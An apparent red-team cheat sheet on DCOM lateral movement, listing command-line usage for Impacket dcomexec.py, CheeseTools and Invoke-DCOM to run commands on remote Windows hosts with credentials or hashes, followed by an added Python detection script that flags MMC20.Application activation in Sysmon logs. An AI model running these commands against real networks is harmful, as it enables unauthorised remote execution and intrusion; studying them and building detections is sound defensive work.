# DCOM

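DCOM is an extension of COM (Component Object Model) that allows applications to instantiate COM objects on remote computers and access their properties and methods.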

**Impacket**

```
DCOMExec.py
>dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
>dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
>dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
>
>python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
-object MMC20 specifies that the MMC20.Application object should be instantiated
-silentcommand executes the command without returning its output
```

**CheeseTools**

```
https://github.com/klezVirus/CheeseTools
https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
-t, --target=VALUE         Target machine
-b, --binary=VALUE         Binary: powershell.exe
-a, --args=VALUE           Arguments: -enc <blah>
-m, --method=VALUE         Methods: MMC20Application, ShellWindows,
                            ShellBrowserWindow, ExcelDDE, VisioAddonEx,
                            OutlookShellEx, ExcelXLL, VisioExecLine, 
                            OfficeMacro
-r, --reg, --registry      Enable registry manipulation
-h, -?, --help             Show Help

Current methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro
```

**Invoke-DCOM**

```
https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1
>Import-Module .\Invoke-DCOM.ps1
>Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe"
```
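
A detection-side view of the `-object MMC20` / `-Method MMC20.Application` commands above, as an added example that is not part of the original page or of any tool listed on it: COM activation starts `mmc.exe` with the `-Embedding` switch, so processes created by that instance stand out in process-creation logs. The field names assume Sysmon Event ID 1, and all sample events are constructed.

```python
# Added example: triage process-creation events for MMC20.Application DCOM use.
# Field names follow Sysmon Event ID 1 (an assumption); all events are constructed.
import ntpath

def _name(path):
    return ntpath.basename(path.strip('"')).lower()

def _embedded(cmdline):
    # COM activation passes -Embedding to the server; /Embedding is the same switch.
    return any(a in ("-embedding", "/embedding") for a in cmdline.lower().split())

def is_mmc_activation(ev):
    """DcomLaunch (svchost.exe) starting mmc.exe as a COM server."""
    return (_name(ev["Image"]) == "mmc.exe"
            and _name(ev["ParentImage"]) == "svchost.exe"
            and _embedded(ev["CommandLine"]))

def is_mmc_dcom_child(ev):
    """Any process created by an mmc.exe instance that was COM-activated."""
    return _name(ev["ParentImage"]) == "mmc.exe" and _embedded(ev["ParentCommandLine"])

def triage(events):
    """Return (activations, children) as lists of (host, command line)."""
    acts = [(e["Computer"], e["CommandLine"]) for e in events if is_mmc_activation(e)]
    kids = [(e["Computer"], e["CommandLine"]) for e in events if is_mmc_dcom_child(e)]
    return acts, kids

SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [  # constructed sample data
    {"Computer": "WS01", "Image": SYS32 + "mmc.exe",
     "CommandLine": SYS32 + "mmc.exe -Embedding",
     "ParentImage": SYS32 + "svchost.exe",
     "ParentCommandLine": SYS32 + "svchost.exe -k DcomLaunch -p"},
    {"Computer": "WS01", "Image": SYS32 + "cmd.exe",
     "CommandLine": SYS32 + "cmd.exe /Q /c ipconfig",
     "ParentImage": SYS32 + "mmc.exe",
     "ParentCommandLine": SYS32 + "mmc.exe -Embedding"},
    {"Computer": "WS02", "Image": SYS32 + "notepad.exe",  # admin using MMC interactively
     "CommandLine": SYS32 + "notepad.exe",
     "ParentImage": SYS32 + "mmc.exe",
     "ParentCommandLine": SYS32 + "mmc.exe " + SYS32 + "eventvwr.msc"},
]

if __name__ == "__main__":
    activations, children = triage(SAMPLE_EVENTS)
    for host, cmd in activations + children:
        print(host, cmd)
```

This check covers only the MMC20 method; ShellWindows and ShellBrowserWindow run through an already running `explorer.exe`, so they need different telemetry.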

